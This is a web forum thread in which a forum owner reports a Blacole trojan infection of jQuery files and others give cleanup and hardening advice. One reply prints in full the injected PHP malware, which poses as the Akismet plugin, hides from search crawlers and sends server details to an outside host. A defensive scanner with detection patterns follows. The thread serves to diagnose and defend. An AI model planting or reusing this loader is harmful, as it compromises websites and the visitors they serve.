Infected forum Trojan.JS.Blacole.Gen
Running Vanilla ver 2.0.18.8
I've recently had a problem with a Trojan worm infecting my forum. My antivirus program picked up the following five attacks as I navigated to a forum page:
Infected object: www.mysite.com/forum/js/library/jquery.livequery.js?v=2.0.18.8
Malware: Trojan.JS.Blacole.Gen
Infected process: [4896] C:\Program Files (x86)\Internet Explorer\iexplore.exe
Infected object: www.mysite.com/forum/js/library/jquery.form.js?v=2.0.18.8
Malware: Trojan.JS.Blacole.Gen
Infected process: [4896] C:\Program Files (x86)\Internet Explorer\iexplore.exe
Infected object: www.mysite.com/forum/js/library/jquery.js?v=2.0.18.8
Malware: Trojan.JS.Blacole.Gen
Infected process: [4896] C:\Program Files (x86)\Internet Explorer\iexplore.exe
Infected object: www.mysite.com/forum/js/library/jquery.gardenhandleajaxform.js?v=2.0.18.8
Malware: Trojan.JS.Blacole.Gen
Infected process: [4896] C:\Program Files (x86)\Internet Explorer\iexplore.exe
Infected object: www.mysite.com/forum/js/library/jquery.popup.js?v=2.0.18.8
Malware: Trojan.JS.Blacole.Gen
Infected process: [4896] C:\Program Files (x86)\Internet Explorer\iexplore.exe
I appear to have removed the infection by replacing the whole www.mysite.com/forum/js folder with a previous backup.
Does anyone have any suggestions as to how the site became infected and how I can prevent this happening again?
Comments
Step one is to run the latest stable version which is 2.0.18.10.
hgtonight is correct. Anyone who reads anything in this forum should put a hold on questions about this and that theme or plugin until they have added the security fixes.
http://vanillaforums.org/discussion/25668/dec-2013-security-update-2-0-18-10-and-2-1b2
I may not provide the completed solution you might desire, but I do try to provide honest suggestions to help you solve your issue.
Check your config.php to see if there is anything there that should not be. Remove this from your computer.
Avoid Internet Explorer.
❌ ✊ ♥. ¸. ••. ¸♥¸. ••. ¸♥ ✊ ❌
I was going to suggest that anyone infected with a trojan or virus should google it.
https://www.google.com/search?q=Trojan.JS.Blacole.Gen
and go to reputable security sites in the links provided.
I can't vouch for this, but the info looks interesting and may provide other insights.
http://goarticles.com/article/Remove-Trojan-Js-Blacole-Gen-How-to-Remove-Trojan-Js-Blacole-Gen-the-Easy-Way/8015793/
Also, Dark Reading is an excellent site:
http://www.darkreading.com/sitesearch?sort=publishDate+desc&queryText=blacole
Thanks to everyone who responded. I had used Google to get info on this virus and how to remove it from a PC, but I couldn't find any reference to cleaning my site or how it might have got infected. I thought posting here might help others remove it quickly, as I did by overwriting the infected folder, but maybe it's so obvious it didn't need saying.
I would still like to know how it got infected in the first place though.
Should I be complaining to my host?
It's great you posted the issue. It will possibly give a wake-up call to those who haven't upgraded as mentioned in the announcement on the forum.
You had security issues because you were using 2.0.18.8.
A bot or someone could have injected it. Without incremental backups and looking at logs, you can't figure out who or when. Who's to say if that was the problem?
But 5 of the js files were infected, so a form or popup code or ajax could have been the entry point.
They will sell you something, I am sure, like SiteLock. They have, or are supposed to have, antivirus protection, and they should have shut you down until you fixed it if they could detect the infection. It is even possible other domains they host got infected too.
Change your FTP password ASAP.
Like peregrine said, someone could have inadvertently uploaded something; however, this virus/trojan appears to upload itself. So it came from the computer of someone who has FTP access to your server and files.
Those files are not supposed to be writable. This is an example of what can happen if you 777 all your files.
General rule of thumb: the cheaper, more high-volume and shared the host is, the less the person on the end of the phone knows what they are talking about, and the more they are reading from a sales script.
@avantime4mike what is more important than the Trojan itself is how it got on your server.
To explain better: your server may be compromised in some way in which files are able to be written to through remote action.
The point of this attack is to use your site as a platform to infect other people's computers and so forth, and also possibly deliver spam directly.
The vast majority of infections have the purpose of spam; if not, they are often to test the capability of the technique in the wild, which would later be used for spam if it works.
If you are not a high value target, or don't support financial transactions, you would not be targeted specifically for that normally.
Aside from firewall and antivirus software, it is important to get the basics right: understanding your setup, and preventing other users, such as the process user of the script, from writing to files they shouldn't. Managing servers and web applications is not without a learning curve, and many people underestimate the skills they need. Understanding the basics of file permissions and ownership is really important.
Another problem is if your computer, or that of any other admin, is infected. Your site doesn't have to be a weak server, because the attack can piggyback on your/their communication as 'legit'.
This is why home security for anyone who has privileged access is paramount. This can be the most frustrating, even for professionals, because they haven't done anything particularly wrong with the server. Regular scans and updates for anyone/any computer that has privileged access are important.
Other than that, you can implement some early detection software, but be aware you get a lot of false positives. It is a tool; you will need to be able to interpret it. You will hone the settings so it does not drive you crazy, but is still effective.
Use the most secure means of connection to your server. Generally speaking you want to use ssh/scp/sftp.
You want to disable other methods such as unsecured FTP, or web-based file management.
You will often find software will complain a lot that there isn't write access, but being conservative is no bad thing.
Make sure the web frameworks you have have the latest security updates.
grep is your friend.
I recently suffered an attack from this particular virus. It basically took out my whole network and uploaded itself to my web hosting too without my knowledge!
After re-installing Windows on all PCs, and virus and malware checking, I thought that that would be all. However, when visiting the home page of my website I received the "show only secure content" dialogue, which was strange as 2 weeks earlier I'd completed an upgrade to https. Investigation followed, and here's what I found and what you should be looking for:
1) The virus normally affects index.php or .html, but will spread throughout a website's subdirectories into any file named index.*. It will include in the source something like:
```php
<?php
// This is your file's PHP *********
$subject = "Website enquiry";
$headers = 'MIME-Version: 1.0' . "\r\n";
$headers .= 'Content-type: text/html; charset=iso-8859-1' . "\r\n";
$headers .= "From:" . $_POST["email"] . "\r\n";
$message = " Name: $name <br>
Email-Id: $email
Message: $query
Remote server: $_SERVER[REMOTE_ADDR] ";
mail($to, $subject, $message, $headers);
} ?>

// This is the injected code *************************
<?php #dad69d#
/**
 * @package Akismet
 */
/*
Plugin Name: Akismet
Plugin URI: http://akismet.com/
Description: Used by millions, Akismet is quite possibly the best way in the world to <strong>protect your blog from comment and trackback spam. It keeps your site protected from spam even while you sleep. To get started: 1) Click the "Activate" link to the left of this description, 2) Sign up for an Akismet API key, and 3) Go to your Akismet configuration page, and save your API key.
Version: 3.0.0
Author: Automattic
Author URI: http://automattic.com/wordpress-plugins/
License: GPLv2 or later
Text Domain: akismet
*/
/* This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA. */
if( empty( $nvsqb ) ) {
    // Stays silent for Google's 74.125.* address range and search-engine crawlers
    if( ( substr( trim( $_SERVER['REMOTE_ADDR'] ), 0, 6 ) == '74.125' )
        || preg_match( "/(googlebot|msnbot|yahoo|search|bing|ask|indexer)/i", $_SERVER['HTTP_USER_AGENT'] ) ) {
    } else {
        error_reporting( 0 );
        @ini_set( 'display_errors', 0 );
        // Fetch helper that tries curl, then allow_url_fopen, then a raw socket
        if( !function_exists( '__url_get_contents' ) ) {
            function __url_get_contents( $remote_url, $timeout ) {
                if( function_exists( 'curl_exec' ) ) {
                    $ch = curl_init();
                    curl_setopt( $ch, CURLOPT_URL, $remote_url );
                    curl_setopt( $ch, CURLOPT_RETURNTRANSFER, true );
                    curl_setopt( $ch, CURLOPT_CONNECTTIMEOUT, $timeout );
                    curl_setopt( $ch, CURLOPT_TIMEOUT, $timeout ); //timeout in seconds
                    $_url_get_contents_data = curl_exec( $ch );
                    curl_close( $ch );
                } elseif( function_exists( 'file_get_contents' ) && ini_get( 'allow_url_fopen' ) ) {
                    $ctx = @stream_context_create( array( 'http' => array( 'timeout' => $timeout, ) ) );
                    $_url_get_contents_data = @file_get_contents( $remote_url, false, $ctx );
                } elseif( function_exists( 'fopen' ) && function_exists( 'stream_get_contents' ) ) {
                    $handle = @fopen( $remote_url, "r" );
                    $_url_get_contents_data = @stream_get_contents( $handle );
                } else {
                    $_url_get_contents_data = __file_get_url_contents( $remote_url );
                }
                return $_url_get_contents_data;
            }
        }
        if( !function_exists( '__file_get_url_contents' ) ) {
            function __file_get_url_contents( $remote_url ) {
                if( preg_match( '/^([a-z]+):\/\/([a-z0-9-.]+)(\/.*$)/i', $remote_url, $matches ) ) {
                    $protocol = strtolower( $matches[1] );
                    $host = $matches[2];
                    $path = $matches[3];
                } else {
                    // Bad remote_url-format
                    return false;
                }
                if( $protocol == "http" ) {
                    $socket = @fsockopen( $host, 80, $errno, $errstr, $timeout );
                } else {
                    // Bad protocol
                    return false;
                }
                if( !$socket ) {
                    // Error creating socket
                    return false;
                }
                $request = "GET $path HTTP/1.0\r\nHost: $host\r\n\r\n";
                $len_written = @fwrite( $socket, $request );
                if( $len_written === false || $len_written != strlen( $request ) ) {
                    // Error sending request
                    return false;
                }
                $response = "";
                while( !@feof( $socket ) && ( $buf = @fread( $socket, 4096 ) ) !== false ) {
                    $response .= $buf;
                }
                if( $buf === false ) {
                    // Error reading response
                    return false;
                }
                $end_of_header = strpos( $response, "\r\n\r\n" );
                return substr( $response, $end_of_header + 4 );
            }
        }
        // Collects details about the compromised server and sends them to the remote host
        $nvsqb['SCRIPT_FILENAME'] = $_SERVER['SCRIPT_FILENAME'];
        $nvsqb['SCRIPT_NAME'] = $_SERVER['SCRIPT_NAME'];
        $nvsqb['PHP_SELF'] = $_SERVER['PHP_SELF'];
        $nvsqb['HTTP_HOST'] = $_SERVER['HTTP_HOST'];
        $nvsqb['REDIRECT_STATUS'] = $_SERVER['REDIRECT_STATUS'];
        $nvsqb['SERVER_NAME'] = $_SERVER['SERVER_NAME'];
        $nvsqb['SERVER_ADDR'] = $_SERVER['SERVER_ADDR'];
        $nvsqb['SERVER_ADMIN'] = $_SERVER['SERVER_ADMIN'];
        $nvsqb = __url_get_contents( "http://s202356987.online.de/www/hp4xqfhr.php" . "?fid=108865&info=" . http_build_query( $nvsqb ) . "&no=1&allow=1", 2 );
        $nvsqb = trim( $nvsqb );
        if( $nvsqb !== 'false' ) {
            echo "";
        }
    }
} #/dad69d# ?>
```
and this will be hidden within an existing php coded section, so check carefully.
2) It will also infect a few important php files in WordPress, notably the header file, where it will disguise itself as the Akismet plugin! So the first thing that you'll see is as above.
If you have Akismet turned on, turn it off and check your code, and remove anything between the opening <?php of the malicious code and the closing ?>, as well as the open and close statements.
The fake Akismet installation will appear close to the head of header.php, about 20 lines down.
3) The next step is to check all your subdirectories for unknown files. The virus is often found within js directories; look for thr6ngby.php or xcgphrzm.php and any other similarly named file within the subdirectory system. These two files not only infected my website, but were spread to website visitors. They crucially also return all your login details plus a copy of an email sent from the website.
The simple rule is - "If you don't know what the file is, then it's probably the virus. Delete the file!"
4) For every javascript and jQuery file you have on your web hosting (and I do mean every), regardless of subdirectory, replace all of them with a freshly downloaded copy of that file. Delete the file first, then upload the new file to your server. DON'T MISS ANY!
5) Final check: do not reinstate your website until you've checked that it's virus free, otherwise you're simply spreading this virus around.
I renamed index.php to index1.php and visited my website. For each website page I allowed time for it to render and cache, plus time for the Antivirus on my machine to scan the page.
Next, I then navigated through each and every webpage, using the same method that I used for the home page. Once complete, I reinstated the index.php page for business as usual.
It's loads of work to do this, but worth the effort. By the way, the file backups of my website which were stored locally were also corrupt! I now upload backups to Dropbox and I suggest that you arrange something similar for important stuff.
6) Finally, as mentioned in another post, change your FTP password and any others for emails, bank accounts etc. that you may have had stored on your machine.
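A defender-side scanner, written for this thread as an added example (not Vanilla's code and not anything the posters ran), that automates three of the checks above in one pass: x00's warning about world-writable files, and bobfelstead's points about the injected marker in index.* files and stray PHP dropped inside js directories. The marker strings come from the sample quoted in his post; the web root it builds is constructed for the demonstration.

```python
import os
import re
import stat
import tempfile

# Indicators lifted from the injected sample quoted in the thread. Real variants
# rename the marker, the variable and the beacon host, so extend this list.
INJECTION_PATTERNS = [
    re.compile(r"#dad69d#"),
    re.compile(r"__url_get_contents|__file_get_url_contents"),
    re.compile(r"Plugin Name:\s*Akismet.*?\$nvsqb", re.S),
]

def scan_tree(root):
    """Walk a web root and return sorted (finding, relative_path) pairs."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            rel = os.path.relpath(path, root)
            # x00's point: web content should never be writable by everyone
            if os.stat(path).st_mode & stat.S_IWOTH:
                findings.append(("world-writable", rel))
            # bobfelstead's point 3: a PHP file has no business inside js/
            if "js" in rel.split(os.sep)[:-1] and name.endswith(".php"):
                findings.append(("php-in-js-dir", rel))
            if name.endswith((".php", ".html", ".js")):
                with open(path, errors="replace") as fh:
                    body = fh.read()
                if any(p.search(body) for p in INJECTION_PATTERNS):
                    findings.append(("injected-code", rel))
    return sorted(findings)

def build_sample_tree():
    """Write a constructed toy web root (not a real site) and return its path."""
    root = tempfile.mkdtemp(prefix="webroot_")
    files = {
        "index.php": "<?php echo 'clean front page'; ?>\n",
        "blog/index.php": "<?php #dad69d# /** @package Akismet */ if( empty( $nvsqb ) ) { } #/dad69d# ?>\n",
        "js/library/jquery.js": "/* constructed stand-in for the library file */\n",
        "js/library/thr6ngby.php": "<?php /* constructed dropped file */ ?>\n",
    }
    for rel, body in files.items():
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w") as fh:
            fh.write(body)
    os.chmod(os.path.join(root, "js", "library", "jquery.js"), 0o777)  # the "777 everything" mistake
    return root
```

Run it against a real document root after replacing the sample with the real path; anything it reports should be compared against a fresh copy of the framework before deleting, as x00 cautions below.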
@bobfelstead are you using vanilla or just warning people?
Really you are better off with a clean installation, with clean copies of themes and plugins. You can take a dump of the database first, and back up any file-based configs and locales, not executable files.
There are similar such examples where the code is deliberately obscured through encoding, so it is even harder to search for.
Deleting random files could break the framework, and you may not solve the issue.
Also the virus, and the payload can be two different things. So replacing the file may not solve the problem permanently until you stop the source of infection (often yourself).
I don't use Vanilla, I'm just alerting people to the issue and what to look out for on their webhost.
Thanks for the tip. However ....
@x00's solution is better. Clear your local PC of any viruses and then follow @x00's instructions.
Have you posted this on every web forum and web blog as well?